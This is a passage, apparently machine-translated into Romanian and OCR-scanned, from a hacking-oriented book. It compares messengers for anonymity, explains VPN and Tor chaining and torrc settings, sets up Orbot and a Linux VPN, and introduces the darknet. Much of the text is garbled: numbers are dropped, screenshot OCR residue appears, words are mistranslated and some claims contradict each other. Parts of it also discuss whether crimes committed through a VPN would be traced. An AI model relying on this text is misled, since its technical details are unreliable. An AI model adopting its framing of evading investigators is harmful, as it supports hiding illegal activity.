mesajelor nu este acceptată (în orice caz, dezvoltatorului nu i se spune despre asta nicăieri), graficul social nu este protejat Cu alte cuvinte, chiar dacă te înscrii anonim, mesajele necriptate vor face în continuare clar cine ești Cu siguranță, acest messenger nu este potrivit pentru comunicare anonimă și sigură Puțini oameni ar dori să folosească Vkontakte ca mijloc de comunicare anonimă Mesajele sunt stocate pe serverele rețelei sociale, nu sunt criptate, înregistrarea se face doar prin număr de telefon, în general, un set complet Cu siguranță nu este recomandat pentru utilizare Messenger de la Facebook, construit pe baza protocolului deschis MQTT (acesta este un protocol de mesagerie, nu-l confunda cu un protocol de criptare) După lansare, capacitatea de a trimite mesaje pe Facebook a fost dezactivată, forțând utilizatorii să instaleze această aplicație Dar te poți înregistra fără a avea un cont Facebook Dacă comparăm Vkontakte și Facebook Messenger, atunci Facebook arată mult mai bine pe fundalul său În primul rând, există posibilitatea înregistrării anonime prin e-mail În al doilea rând, chat-urile E EE sunt acceptate, dar nu în mod implicit Pentru a activa criptarea mesajele de care aveți nevoie pentru a activa "Conversații secrete" Cu toate acestea, Facebook colectează o mulțime de tot felul de informații despre utilizator, așa că nu este potrivit pentru comunicarea sigură De asemenea, nu acceptă sincronizarea chat-ului E EE, nicio notificare de verificare a amprentei, nicio chat-uri de grup criptate și nicio protecție a graficelor sociale WickrMe Pretinde a fi cel mai anonim mesager În mod implicit, criptarea E EE este activată, nu există nicio legătură către un număr de telefon, mesajele dvs sunt stocate numai pe dispozitivul dvs și apoi doar pentru o perioadă de timp, apoi sunt șterse automat Aplicația nu are acces la contactele dvs Pe de o parte, acest lucru nu este foarte convenabil, pe de altă parte, nimeni nu va ști măcar că îl utilizați, cu excepția cazului în care vă furnizați dvs de conectare WickeMe Există versiuni pentru Windows, iOS, Android Pe site-ul https://wickr com/privacy/, dezvoltatorii scriu că nu stochează mesajele utilizatorilor pe server (vă puteți crede acest lucru, deoarece istoricul chat-ului nu este sincronizat - ceea ce ați scris pe mobil va rămâne acolo - pe desktopul acestor mesaje nu sunt vizibile) și că nu stochează cheile pentru decriptarea mesajelor Acordați atenție acestor informații: Va anunța Wickr utilizatorii cu privire la solicitările de informații despre cont? Politica Wickr este de a notifica utilizatorii cu privire la solicitările pentru informațiile contului lor înainte de dezvăluire, inclusiv furnizarea utilizatorului cu o copie a solicitării, cu excepția cazului în care ne este interzis prin lege să facem acest lucru sau dacă există pericol de deces sau vătămare corporală gravă De îndată ce acest lucru este permis legal, vom notifica utilizatorii noștri cu privire la solicitările de informații ale acestora Pe scurt, politica Wickr cu privire la solicitările de informații despre cont este următoarea: o astfel de solicitare va fi notificată utilizatorului (adică veți ști că sunteți urmărit) - utilizatorul va primi chiar și o copie a solicitării Și uită-te la asta: Conținutul comunicațiilor nu este disponibil Solicitările privind conținutul comunicărilor necesită un mandat de percheziție valid de la o agenție cu jurisdicție corespunzătoare asupra Wickr Cu toate acestea, răspunsul nostru la o astfel de solicitare se va reflecta " j că conținutul nu este stocat pe serverele noastre sau că, în cazuri foarte limitate în care un mesaj nu a fost încă preluat de către destinatar, conținutul este date criptate care sunt indescifrabile Wickr poate accepta o solicitare de transfer de conținut de la forțele de ordine, dar răspunsul va fi că conținutul nu este stocat pe serverele Wickr și, prin urmare, nu poate fi transferat către acestea Când vă înregistrați cu Wickr, trebuie doar să specificați un nume de utilizator (nu ar trebui să fie ocupat) și o parolă Toate Fără e-mail, fără număr de telefon În acest moment, aceasta este o opțiune foarte bună pentru comunicarea confidențială Principalele caracteristici ale aplicației: • Aplicația este disponibilă pe platformele iOS, Android, Windows, Mac OS X, Linux • Messengerul nu este legat de un număr de telefon, trebuie să specificați un e-mail pentru a vă înregistra în el Tot ce este necesar este să specificați un ID care nu este încă ocupat de alți utilizatori După aceea, puteți discuta • Când începeți să lucrați în messenger, trebuie să vă găsiți prietenii prin ID Dacă prietenii tăi nu sunt pe Wickr, le poți trimite o invitație prin SMS sau e-mail • Wickr poate trimite mesaje text și vocale, dar nu poate efectua apeluri video Dar acesta nu este un dezavantaj: în cele mai multe cazuri, schimbi doar mesaje text și imagini Vocea și video sunt folosite mai rar • Mesajele se vor autodistruge atât pe dispozitivul expeditorului, cât și pe cel al destinatarului după ceva timp Utilizatorul poate seta independent un cronometru pentru a șterge mesajul Timpul poate fi setat de la o secundă la câteva zile • Aplicația folosește protocoalele de criptare AES , ECDH și RSA Compania de mesagerie aderă la politica de protecție a datelor utilizatorului: nu rămân date utilizator pe serverele Wickr • În messenger, puteți crea un chat de grup, numărul de participanți la care nu depășește persoane • Messenger nu îmbină contactele În general, i se poate refuza accesul la contacte și va funcționa bine akini pe exemple • Imposibilitatea de a face o captură de ecran a corespondenței Sârmă Sârma este, de asemenea, o opțiune foarte bună În primul rând, există posibilitatea înregistrării anonime În al doilea rând, criptarea end-to-end (E EE) este acceptată implicit, chiar și cu capacitatea de a sincroniza chat-urile criptate În al treilea rând, există protecția graficelor sociale, chat-urile criptate de grup (până la de persoane), apelurile de conferință securizate (până la persoane) sunt acceptate și există posibilitatea notificării necesității verificării amprentelor digitale E EE Am văzut ceva similar în Briar, dar există o selecție uriașă de platforme acceptate - Android, iOS, Windows, macOS, Linux Ar trebui să fie o muscă în unguent? Așa este: messengerul este plătit și costă euro pe lună Având în vedere că poți folosi WickrMe gratuit, nu pare să fie prea nevoie de acest messenger În ceea ce privește înregistrarea anonimă, messengerul este atașat la e-mail După cum s-a arătat mai devreme, puteți obține o adresă poștală anonimă, astfel încât nu vor fi probleme cu anonimizarea atunci când vă înregistrați în acest messenger capitolul Anonimat pe internet Este posibil să? Mai devreme, în capitolul , v-am arătat cum să vizitați site-urile blocate Dar vizitele noastre vor fi anonime? Și, în general, cum puteți păstra anonimatul atunci când lucrați pe Internet Vom vorbi despre asta în acest capitol Anonimat parțial Am ascuns adresa IP, transmitem date printr-o conexiune criptată și chiar din SUA sau Luxemburg Suntem hackeri tari! De fapt, acesta nu este cazul și nu există anonimat chiar și atunci când utilizați un VPN, ca să nu mai vorbim de alte modalități de a ocoli site-urile ascunse descrise în Capitolul În primul rând, trebuie să decideți de ce aveți nevoie de anonimat Există două motive principale Primul motiv este că nu doriți ca furnizorul sau altcineva să vadă ce site-uri vizitați, ce date transmiteți prin Internet Nu vei comite nicio activitate ilegală - nu vei pătrunde în bănci, nu vei publica videoclipuri pentru adulți și nu vei comite alte tipuri de infracțiuni În acest caz, nimeni nu te va căuta și nimeni nu este interesat de tine În acest caz, alegeți orice serviciu VPN descris în Capitolul și calmați-vă ISP-ul dvs nu va vedea ce transmiteți și ce site-uri vizitați Dacă doriți, puteți vizita site-uri în modul incognito, astfel încât istoricul să nu fie salvat pe computerul local Se obține anonimatul parțial și puteți trece la citirea capitolului următor Ce se întâmplă dacă săvârșiți fapte ilegale? Atunci te vor căuta Orice serviciu VPN, în primul rând, vrea să se asigure și să profite în siguranță Lui, de fapt, nu îi pasă de anonimatul clienților înșiși Să ne imaginăm că ai spart un site web printr-un VPN Să te găsesc este o briză În primul rând, adresa IP a serviciului VPN va fi calculată, apoi agențiile de aplicare a legii vor contacta acest serviciu și apoi este o chestiune de tehnologie Furnizorul VPN păstrează jurnalele detaliate care arată cine, când și unde este conectat Dacă vei fi calculat sau nu, totul depinde ETC shhhhh pe amploarea dezastrului Dacă te încurci mare, te vor găsi Dacă te încurci puțin, nimeni nu te va căuta Da, vor vedea adresa IP a serviciului VPN În continuare, trebuie să depuneți o cerere la agențiile de aplicare a legii, cererile oficiale, instanțe etc Toate acestea se vor întinde în timp, iar dacă infracțiunea a fost o singură dată și pierderile financiare ale victimei sunt mici, nimeni nu te va găsi Dar cu infracțiuni sistematice, trebuie să înțelegi că vei fi calculat și tehnic nu este dificil Desigur, există și perfecționiști Nu intenționează să facă nimic ilegal, dar nu vor ca nici măcar furnizorul VPN să știe ce site-uri vizitează și ce date transmit Acest capitol este destinat special acestor utilizatori În ea, vom căuta modalități de a obține un anonimat real Dacă ești descoperit, se datorează doar factorului uman, adică tu însuți vei lăsa un semn și vei greși ceva Deci, acum vom vorbi despre lanțurile proxy și despre legendarul proiect Tor Notă Fiecare browser web modern are un mod incognito pentru a intra în care trebuie să apăsați Ctrl + Shift + N Este important să înțelegeți că, de fapt, nu se pune problema vreunui anonimat Doar că browserul nu va salva unele date, cum ar fi istoricul de navigare, cookie-urile Dar toate acțiunile dvs vor fi vizibile pentru site-urile pe care le vizitați (vă vor vedea adresa dvs IP), administratorul de sistem și ISP Acest lucru este descris în detaliu la intrarea în modul incognito în browserul Chrome (Fig ) Modul incognito poate fi util, astfel încât informațiile inutile să nu fie salvate pe computerul local Notă În unele cazuri, este util să rulați constant în modul incognito, de exemplu, atunci când nu aveți nevoie ca istoricul site-urilor vizitate să fie salvat pe computer Îl puteți șterge oricând apăsând Ctrl + Shift + Del, dar puteți uita să o faceți! Deci, deschideți Chrome și introduceți chrome://flags Activați (setat la Activat) opțiunea Activare comandă rapidă pe desktop incognito După repornirea browserului în modul incognito, va fi posibilă crearea unei comenzi rapide pentru a lansa browserul în modul incognito În acest caz, la pornirea browserului, nu va mai trebui să apăsați Ctrl + Shift + N pentru a intra în acest mod Capitolul Anonim pe Internet Este posibil să? Mod incognito Rtii D "VNIYA er*zhime incognito r/dut h £ access" Și alte programe software l-seetegmm ACEST dispozitiv Cu toate acestea, marcajele și fișierele descărcate vor fi salvate În "Tigstgk" nk va fi salvat următoarea informație • istoria Wraw wpe; • Fișiere Soocle și datele site-ului web, • gendenmie care fY y * strigă sub forma " Partajările dvs demonstrative > vor fi vizibile • site-ul "">ToptJp cu: și ghxxishchy • sistemul dumneavoastră de admiii ci pațppy; • Furnizor de internet Blocați cookie-urile de la terți Când această setare este activată, site-urile nu pot folosi fișierele coctoe cahors" - egc n VPN > Tor > Internet Avantajul acestei metode este că furnizorul nu va vedea că utilizați Tor (unii furnizori pot bloca Tor), deși vor vedea că utilizați un VPN Dar, în același timp, Tor în sine nu vă va vedea adresa IP atunci când intrați în rețeaua Tor, ceea ce poate fi considerat o măsură suplimentară de securitate La rândul său, furnizorul VPN nu va vedea ce faceți, deoarece totul va fi criptat de rețeaua Tor, ceea ce este, de asemenea, un avantaj față de faptul că furnizorii înregistrează toate acțiunile utilizatorului Dezavantajul este că serviciul VPN vă va vedea adresa IP reală Unele servicii VPN (NordVPN, Privatoria, TorVPN) au setări pentru crearea de conexiuni Tor-through-VPN Este bine, dar folosirea unui browser Tor care oferă criptare end-to-end este încă mai bună VPN prin Tor Când utilizați un VPN prin Tor, lanțul arată astfel: Computerul dvs > Tor > VPN > Internet Acest tip de conexiune este mai sigur decât primul, oferă anonimatul aproape complet și confidențialitatea internetului Cu toate acestea, există doar două servicii VPN care acceptă astfel de conexiuni, și anume AirVPN și BolehVPN Dacă nu sunteți derutat de o selecție atât de mică, atunci VPN prin Tor este opțiunea preferată În primul rând, serviciul VPN nu vă cunoaște adresa IP reală, ci vede doar adresa IP a punctului de ieșire din rețeaua Tor Dacă ai ajuns până aici, atunci merită să plătești pentru un VPN doar cu bitcoin și doar prin browserul Tor În acest caz, serviciul VPN nu va avea un singur indiciu prin care să fii identificat, chiar dacă serviciul păstrează jurnalele Un alt plus cert este protecția împotriva punctelor de ieșire periculoase din rețeaua Tor (mulțumită serviciului VPN care criptează datele) Această metodă ocolește orice blocare a ieșirii rețelei Tor pe care o puteți întâlni folosind o conexiune Tor VPN Dacă nu doriți să vă încurcați cu configurarea unei conexiuni Tor VPN, vă puteți conecta oricând Tor printr-un VPN Pentru a face acest lucru, trebuie să vă conectați la un serviciu VPN și apoi să lansați browserul Tor Utilizarea browserului Tor pe Windows Pentru a începe să utilizați Tor, trebuie să descărcați browserul Tor Acesta este un browser Firefox configurat special După descărcare, trebuie să instalați Tor ca program obișnuit Comanda rapidă va fi creată automat pe desktop, o puteți muta în bara de activități pentru mai multă comoditate Tog capitolul Se poate transporta? instalat ca program obișnuit și nu necesită cunoștințe speciale Făcând clic pe scurtătură, va apărea o casetă de dialog cu două opțiuni: conectați imediat (butonul Conectare) sau configurați mai întâi proxy-ul (butonul Configurare) Dacă doriți să configurați o conexiune Tor VPN (sau să vă conectați printr-o rețea monitorizată sau cenzurată), trebuie să selectați a doua opțiune și să configurați totul manual Când lucrați prin browserul Tor, primul lucru de făcut este să vă asigurați că funcționează corect Pentru a face acest lucru, accesați orice site care arată adresa IP a vizitatorului (de exemplu, myip ru) Dacă nu vezi propria ta adresă IP, ești bine! Utilizarea browserului Tor este foarte simplă - introduceți adresa URL de care aveți nevoie și lucrați ca de obicei (Fig ) Motoarele de căutare nu sunt foarte îndrăgostite de Tor (din motive evidente, deoarece își pierd banii din publicitate direcționată), așa că pot apărea probleme în găsirea informațiilor în același Google Puteți utiliza orice alt motor de căutare care este mai loial lui Tor sau puteți introduce adresele site-ului direct, în loc să alegeți dintre rezultatele cautarii Orez Browser Tor Câteva recomandări pentru utilizarea în siguranță a Tor: • Nu vizitați site-uri care nu au o versiune HTTPS, ci doar Tor - acesta este doar un instrument de rutare a traficului care criptează tot traficul în cadrul rețelei Tor Traficul care iese din rețea nu mai este criptat! Acest lucru vă face vulnerabil atunci când traficul ajunge la punctele de ieșire, deoarece acolo este decriptat Prin urmare, trebuie să utilizați în mod constant metode și mijloace de criptare end-to-end (SSL sau TLS) și să vizitați numai site-uri care utilizează protocolul HTTPS Nu va fi de prisos să folosiți pluginul HTTPS Everywhere Nu descărcați torrente prin Tor Această rețea nu a fost creată pentru schimbul de fișiere peer-to-peer (de la punct la punct) Cel mai probabil, în multe puncte de ieșire, toate acestea vor fi blocate Utilizarea traficului P P încetinește viteza rețelei Tor a celorlalți utilizatori și vă amenință anonimatul (clienții BitTorrent vă trimit adresa IP către trackerii și colegii BitTorrent) Nu includeți adresa dvs de e-mail principală Așa cum a spus o persoană înțeleaptă, "Folosirea lui Tog și furnizarea adresei tale de corespondență este ca și cum ai prezenta la o mascarada cu o mască și o insignă cu numele tău pe ea" Cel mai bine este să creați o cutie poștală pe unul dintre serviciile de e-mail anonime precum tuta io Desigur, acest lucru ar trebui făcut numai după conectarea la rețeaua Tor și nu înainte (Fig ) Nu folosi Google Acest motor de căutare este renumit pentru colectarea comportamentului utilizatorilor și a rezultatelor căutării pentru a-și crește propriile venituri În loc de Google, este mai bine să utilizați DuckDuckGo C A - ■£> O V nota VOU&US PRCINU FEÂTbrIS V BUSINESS v AO v BLOC fJDGlN E-mail securizat pentru toată lumea Tutanota este serviciul de e-mail securizat wortd mosî ușor de utilizat și privat prin design Înscrieți-vă pentru e-mail criptat gratuit npw Pic Site tuta io Pe fig arată meniul browser Tor Diferă de meniul standard Firefox, are două elemente noi: • New Identity - creați o nouă identitate Toate informațiile despre dvs sunt șterse, inclusiv site-urile pe care le-ați vizitat, cookie-urile instalate, este creat un nou lanț de noduri Tor În general, începeți de la zero Ceva de genul o repornire rapidă a browserului Tor • Circuit Tor nou pentru acest site - vă permite să creați un circuit nou de noduri Tor pentru site-ul curent, dar nu șterge identitatea utilizatorului Dacă ați fost autentificat pe site, atunci nu veți fi deconectat, dar cel mai probabil adresa dvs IP va fi schimbată Modul în care va transfera site-ul depinde numai de acesta O comandă similară poate fi folosită dacă trebuie doar să schimbați lanțul de noduri, de exemplu, când conexiunea este lentă și nu doriți să părăsiți site-urile, ci doriți doar ca conexiunea să funcționeze mai rapid Există șansa ca un lanț mai rapid să fie ales □ X - O HSs Suplimente CM+Shrft>A ep StrictEntryNodes Există o altă setare utilă din această serie - TrackHostExits fixează nodul de ieșire (gazdă) pentru domeniile date, ceea ce vă permite să salvați sesiunea pentru acele servere care verifică IP-ul clienților Sintaxa de scriere este: TrackHostExits host, domain, Excluderea gazdelor suspecte Oricine poate deveni membru al rețelei Tor și poate implementa propriul nod Tor, inclusiv agențiile noastre galante de aplicare a legii Din fericire, Tor poate rezolva această problemă - în setări puteți specifica prin ce noduri din ce țări nu trebuie să treacă datele dvs : ExcludeNodes {ru), {ua), {by) Acum, dacă tipii curioși cu ochi cenușii din Federația Rusă, UA sau RB se gândesc să facă un server Tor fals și încearcă să asculte rezultatul, atunci nu vom putea ajunge la un astfel de server Notă Există o proprietate utilă a torre Acesta este un comentariu Tor nu execută o linie într-un fișier torre dacă linia începe cu caracterul "#" Datorită comentariilor, puteți stoca spații libere în fișierul torre și când necesitatea de a le porni rapid prin eliminarea "#" Interzicem utilizarea computerului ca nod de ieșire Imaginează-ți: tipi cu inscripții de trei litere pe spate intră în tine și încearcă să te acuze de toate păcatele de moarte și nu faci nimic făcut! Cineva a făcut totul pentru tine, iar computerul tău a fost doar un nod de ieșire În general, pentru a preveni acest lucru, adaugă următoarele rânduri la torre: ExitPolicy reject *:* # nu sunt permise ieșiri ExitPolicy reject *:* # nu sunt permise ieșiri Acestea interzic utilizarea serverului nostru ca punct de ieșire (Nod de ieșire) pentru trafic În caz contrar, Tor va încerca să folosească serverul nostru pentru a redirecționa traficul de rețea de ieșire către servere externe Din păcate, nu toată lumea folosește Tor cu intenții bune, iar dacă traficul părăsește Tor prin serverul tău, toate problemele și consecințele vor cădea și pe capul tău Instalarea unui server proxy în Tor Adăugați următoarele rânduri la sfârșitul fișierului de configurare Tor, înlocuind și (precum și și , dacă există) cu valorile specifice ale proxy-ului http sau https server de specificat # Forțați Tor să facă toate cererile de director HTTP prin această gazdă:port (sau # gazdă: dacă portul nu este setat) HttpProxy : # O pereche nume de utilizator:parolă care să fie utilizată cu HTTPProxy HttpProxyAuthenticator : # Forțați Tor să realizeze toate conexiunile TLS (SSL) prin această gazdă:port (sau # gazdă: dacă portul nu este setat) HttpsProxy : # O pereche nume de utilizator:parolă care să fie utilizată cu HTTPSProxy HttpsProxyAuthenticator : După editarea și salvarea fișierului torre, trebuie să reporniți Tor Pentru a verifica setările, puteți utiliza analizorul Tor (accesați http://check torproject org) Alte opțiuni de fișier de configurare Tabelul conține diverse opțiuni utile pentru fișierul de configurare Tor Tabelul Parametrii fișierului de configurare Tor Descrierea parametrului EntryNodes nickname,nickname, O listă de servere care ar trebui să fie de preferință folosite ca "input" pentru a stabili o conexiune TCP/IP cu lanțul gazdă de routere Tor, dacă este posibil ExitNodes nickname,nickname, O listă de servere cărora ar trebui să li se atribuie, de preferință, rolul verigii de închidere în lanțul de noduri al routerelor Tor, dacă este posibil ExcludeNodes nickname,nickname, O listă de noduri care nu ar trebui să fie folosite deloc la construirea unui lanț de noduri StrictExitNodes | Dacă se setează la , Tor nu va folosi alte noduri decât cele prezente în lista de noduri de ieșire ca intermediari care stabilesc o conexiune cu gazda țintă și, în consecință, sunt un fel de verigă de închidere în lanțul de noduri StrictEntryNodes | Dacă acest parametru este setat la , Tor nu va folosi alte noduri decât cele prezente în lista de noduri de intrare pentru a se conecta la rețeaua Tor Firewall fascist | Dacă acest parametru este setat la , Tor, atunci când creează o conexiune, va contacta numai ruterele Onion, care au numere de porturi strict definite deschise pentru conexiune, cu care firewall-ul dvs permite conexiunea (implicit: th (http), -th ( https), vezi FirewallPorts) Ego-ul îi va permite lui Thor, care rulează pe sistemul tău, să lucreze ca client în spatele unui firewall care are politici restrictive stricte Inversul nu este adevărat, deoarece în acest caz Tor nu va putea îndeplini atribuțiile unui server închis de un astfel de firewall FirewallPorts PORT-uri Listă de porturi la care firewall-ul tău permite conectarea Folosit numai când este setată valoarea parametrului FascistFirewall (Implicit: ) (Implicit: ) LongLivedPorts PORTURI Listă de porturi pentru servicii care tind să stabilească conexiuni deosebit de lungi (în mare parte chat-uri, precum și rețele interactive) pentru a reduce probabilitatea de deconectare a serverului nod de la rețeaua Tor înainte ca fluxul să fie închis (Implicit: , , , , , , , , ) MapAddress adresa:new address Când Tor primește o solicitare pentru adresa specificată, SAU va schimba adresa înainte de a procesa cererea De exemplu, dacă doriți ca conexiunea la www example com să folosească un lanț de noduri Tor care ies prin torserver (unde torserver este alias-ul serverului), utilizați "MapAddress www example fagure www exemplu sută torserver Ieșire" NewCircuitPeriod NUMBER La fiecare NUM secunde, analizați starea conexiunii și decideți dacă inițiați construcția unui nou lanț nodal (Implicit: de secunde) MaxCircuitDirtiness NUMBER Permiteți reutilizarii unui circuit pentru prima dată într-o anumită compoziție a legăturilor sale - cel mult - în urmă cu NUM secunde, dar nu atașați niciodată un fir nou la un circuit care a servit această sesiune suficient de mult timp (implicit: minute) Alias NodeFamily, alias, Serverele numite Tor (în mod firesc, pentru a crește gradul de transparență al ierarhiei rețelei Tor) sunt combinate în "familii" pe baza administrării comune sau în comun, așa că ar trebui să evitați utilizarea oricăror dintre aceste noduri, "legături de rudenie înrudite" în același lanț de routere anonime Tor O setare specială a opțiunii NodeFamily poate fi necesară doar atunci când serverul cu aliasul dat nu raportează el însuși la ce "familie" se referă, care trebuie declarată pe partea serverului SAU prin specificarea parametrului MyFamily în fișierul torre Sunt permise mai multe indicații ale acestei opțiuni RendNodes alias, alias, O listă de noduri pe care ați dori să le utilizați ca puncte de întâlnire dacă este posibil RendExcludeNodes alias, alias, O listă de noduri care nu ar trebui să fie utilizate niciodată la selectarea punctelor de întâlnire (puncte de întâlnire) PORT SOCKSPort Notificați-l pe Tor să asculte pe acest port conexiunile stabilite de aplicații care utilizează protocolul SOCKS Setați acest parametru la zero dacă nu doriți ca aplicațiile să stabilească conexiuni SOCKS folosind Tor (Valoare implicită: ) SOCKSBindAddress IP[:PORT] Conectați-vă la această adresă pentru a asculta cererile de conectare de la aplicațiile care comunică prin protocolul SOCKS (Implicit: ) De asemenea, puteți specifica un port (de exemplu, : ), care, bineînțeles, trebuie să fie "deschis" pe mașina țintă folosind cel corespunzător setări firewall Definiția acestei opțiuni poate fi repetată de mai multe ori pentru a implementa legarea simultană ("paralelă") la mai multe adrese/porturi diferite SOCKSPolicy policy,policy, Specifică politicile de conectare pentru acest server pentru a restricționa mașinile client care au permisiunea de a se conecta la un port SOCKS Descrierea acestor politici este introdusă în același mod ca și pentru politicile de ieșire (vezi mai jos) TrackHostEx gazda sa, domain, Pentru fiecare dintre valorile din lista separată prin virgulă, Tor va urmări conexiunile recente pentru gazde care se potrivesc cu acea valoare și va încerca să folosească același nod de ieșire (terminare) pentru fiecare dintre ele Dacă următorul element al listei este precedat de simbolul " ", atunci valoarea acestuia va fi interpretată ca corespunzătoare domeniului în ansamblu Dacă unul dintre elementele listei constă dintr-un singur "punct", atunci aceasta indică corespondența sa "universală" cu toate căile Această opțiune poate fi utilă dacă vă conectați adesea la servere care invalidează toate înregistrările autentificării dvs (adică vă forțează să vă deconectați și să vă conectați din nou) atunci când încercați să redirecționați o conexiune TCP/IP stabilită cu unul dintre aceste servere, către noul dvs Adresa IP după următoarea modificare Rețineți că utilizarea acestei opțiuni este dezavantajoasă pentru dvs , deoarece permite serverului să asocieze direct istoricul conexiunilor solicitate de un anumit IP cu contul dvs de utilizator Deși, în principiu, dacă cineva trebuie să colecteze toate informațiile despre șederea dumneavoastră pe server, cei care doresc în orice caz vor putea face acest lucru prin cookie-uri sau alte mijloace specifice protocolului de schimb utilizat TrackHostExitsExpire NUMBER într-un fel sau altul - într-un mod arbitrar, aleatoriu, este de dorit ca asocierea dintre gazdă și nodul de ieșire să își piardă automat puterea după un anumit NUMĂR de secunde de inactivitate completă pe partea serverului Valoarea implicită este de secunde ( de minute) j Setul existent de comenzi Tor este suficient de mare Luarea în considerare a tuturor acestora depășește scopul acestei revizuiri Aici au fost date doar câteva dintre cele mai tipice opțiuni de editare și doar o parte din comenzi O listă completă și sintaxa comenzilor (în engleză) pot fi găsite pe site-ul web Tor Instalarea Tor în Android Torproject pentru Android se numește Orbot și poate fi descărcat de pe https://play google com/store/apps/details?id=org torproject android Dar instalarea Orbot nu înseamnă că dispozitivul tău este acum protejat și că poți transfera date în siguranță Deloc Este necesară o configurație suplimentară Lansați Orbot Veți vedea o ceapă cenușie mare - acesta este simbolul proiectului Tor Este gri, deoarece smartphone-ul nu este conectat la rețeaua Tor în acest moment ment (Fig ) Orez Aplicația Orbot Faceți clic pe arc Procesul de conectare la rețeaua Tor va începe De îndată ce conexiunea este stabilită, va apărea următorul mesaj (Fig ) Hakini prin exemple You'vesucce(r) fullyconnect"lto ha Tornetwodi dar asta face tGTrt"e-inyt urd Vedeți-ne la htrpsV/Quardianproject info tpp wbot sau trimite un e-mail către qârdianprqe*ai nfotokâmnioft Bine Orez Ce browser să folosești? Pic Sunteți conectat la rețeaua Tor Mesajul spune că ești conectat la Tor, dar asta nu înseamnă că dispozitivul tău este în siguranță De asemenea, se recomandă să apăsați butonul Browser pentru a vă testa conexiunea Apasă-l În continuare, vi se va întreba ce browser să utilizați - standard sau Orfox (este mai sigur), vezi fig Este mai bine să alegeți Orfox În continuare, Orbot va afișa o listă de aplicații pentru lucrul cu rețeaua Tor Toate aceste aplicații sunt configurate să utilizeze Tor și nu vor ocoli conexiunea la Internet (Figura ) Instalează aceste aplicații și folosește-le în locul celor standard Pentru ca un program de rețea (altul decât Opvieh) să funcționeze cu Tor, acesta trebuie configurat corespunzător Dar întreaga problemă este că nu toate programele vă permit să setați parametrii necesari Dacă puteți specifica parametrii serverului proxy în setările programului, atunci poate fi "prieteni" cu Tor Vizualizați opțiunile programului Dacă vă permite să specificați un server proxy, atunci specificați adresa IP proxy și portul Puteți încerca să utilizați modul proxy transparent, alias VPN În acest caz, tot traficul de ieșire va trece prin Tor Dar iată ce trebuie să știți despre această funcție: necesită privilegii de root pentru a funcționa și nu funcționează pe toate dispozitivele Pentru a o activa, apăsați butonul VPN (Fig ) eargіYІolpige"'ѵv"*io,ѵ ge aiiii w'h C bot Chckepch buttnn pentru a instala acum sau le puteți găsi mai târziu pe Google Ptay la GuardianProjetl mfo websrte sau prin F-Dnwd org Navigare îmbunătățită prin Orfax Pnvacy care trece prin Gog ChatSecure: Secure rhat appvmth Encfyption Off-the-Record DuckOuckGo >aplicația ear Engine Twttter proxy pentru a găzdui locathosf și portul e StoryM 'ke - Mak-astoryand hr-wt rt to tor forsecunty MobileMertus BweiechHuman Rightn Documentation App Finei aii Guardian Project apps ort GougL Pfay Tu mașină, deie "r urnind trntflK" to m * nshvshpya * Ok-v Mod VPN pentru aplicații Orbot Puteți activa toate aplicațiile de pe dispozitiv să ruleze prin sistemul Tor folosind caracteristica VPN a Android "AVERTISMENT" Aceasta este o caracteristică nouă, experimentală și, în unele cazuri, este posibil să nu pornească automat sau să se oprească NU ar trebui să fie uscd pentru anonimat și folosit NUMAI fbr gettmg prin firewall-uri și filtre Orez Activați modul VPN Pic Aplicații pentru lucrul cu Tor VPN pentru Linux Această carte, deși pentru hackeri și utilizatori experimentați, dar va fi utilă pentru începători Iar pentru începători, este important ca totul să fie cât se poate de simplu Ideal - a instalat programul - și funcționează imediat În cazul unui VPN în Linux, totul nu este atât de simplu - de multe ori trebuie să configurați manual conexiunea VPN, ceea ce nu este întotdeauna clar pentru un utilizator începător care tocmai face primii pași în Linux Prin urmare, vă recomandăm VPN de la KeepSolid VPN Unlimited, care oferă un client convenabil pentru Linux care funcționează imediat după instalare Puteți descărca clientul VPN de la: https://www aplicație vpn nelimitată com/ru/downloads/lin-le Pachetul descărcat conține multe dependențe (pentru ca acesta să funcționeze, sistemul trebuie să instaleze multe alte pachete), așa că pentru a-l instala corect, trebuie să deschideți un terminal, să mergeți la directorul Descărcări (comandă cd ~/ Descărcări) și să introduceți comanda: sudo apt install /vpn-unlimited- deb După instalare, puteți porni clientul astfel: VPN nelimitat La prima pornire, trebuie să vă înregistrați, apoi apăsați butonul START din fereastra programului Conexiunea VPN va fi stabilită în câteva secunde Majoritatea timpului petrecut cu configurarea unei conexiuni VPN va fi petrecut instalând pachete și înregistrându-se la serviciu Perioada de probă gratuită este acordată pentru o săptămână, iar apoi va trebui să plătiți Tarifele pot fi găsite pe site-ul serviciului VPN UnUmited Conectați-vă cu KeepSolid sau creați unul nou pentru securitatea online Introduceți adresa de email £ Introduceți parola A intra f Facebook G Google Am uitat parola Creați un nou ID KeepSolid Orez Client VPN pe Linux Ce este Dark Net? În acest capitol am vorbit despre Tor Apropo de Thor, este imposibil să nu vorbim despre DarkNet Rețeaua globală poate fi împărțită în trei straturi: Vizibil - iată resursele web obișnuite, site-uri care pot fi vizitați printr-un link regulat sau găsiți în motoarele de căutare Deep - aici sunt site-uri care sunt închise de la indexarea de către motoarele de căutare masini Acestea includ rețele și spații de stocare corporative, la care accesul este închis prin autentificare și parolă Un utilizator normal nu are acces la ele DarkNet - numele colectiv al tuturor rețelelor de calculatoare destinate pentru transmiterea anonima a informatiilor Există servicii pentru comercializarea, de regulă, de bunuri interzise, comunicare anonimă sau schimb de tot felul de conținut Astfel de servicii nu pot fi deschise cu un browser obișnuit sau găsite într-un motor de căutare obișnuit Arhitectura DarkNet împiedică supravegherea și controlul asupra transferului de informații Prin urmare, pe de o parte, darknet-ul poate fi atât un instrument împotriva cenzurii, cât și un front pentru crime, pe de altă parte În multe țări ale lumii, utilizarea rețelelor ascunse nu este interzisă Dar pe dark web în sine, există multe lucruri care sunt interzise de lege în majoritatea țărilor Recent, tranzacționarea pe darknet a crescut la cote fără precedent - la urma urmei, a apărut bitcoin anonim, permițându-vă să transferați bani într-adevăr anonim Darknet-ul a devenit o piață neagră virtuală Aici puteți cumpăra droguri, arme, pornografie infantilă, date furate (de exemplu, numere de card de credit furate) și alte bunuri care nu pot fi vândute pe site-uri obișnuite, altfel problemele legale sunt garantate A intra în darknet este mult mai ușor decât crezi Fereastra de acolo este Tog Site-urile de pe dark web au adrese speciale în zona opiop Site-urile din această zonă nu pot fi deschise într-un browser obișnuit, doar Tor Deși cartea este dedicată hacking-ului, nu vom publica adrese de resurse cu conținut interzis doar din motive morale Dacă doriți să cunoașteți dark web și nu știți de unde să începeți, porniți Tor și accesați unul dintre aceste site-uri: • Director de link-uri către site-uri web întunecate populare The 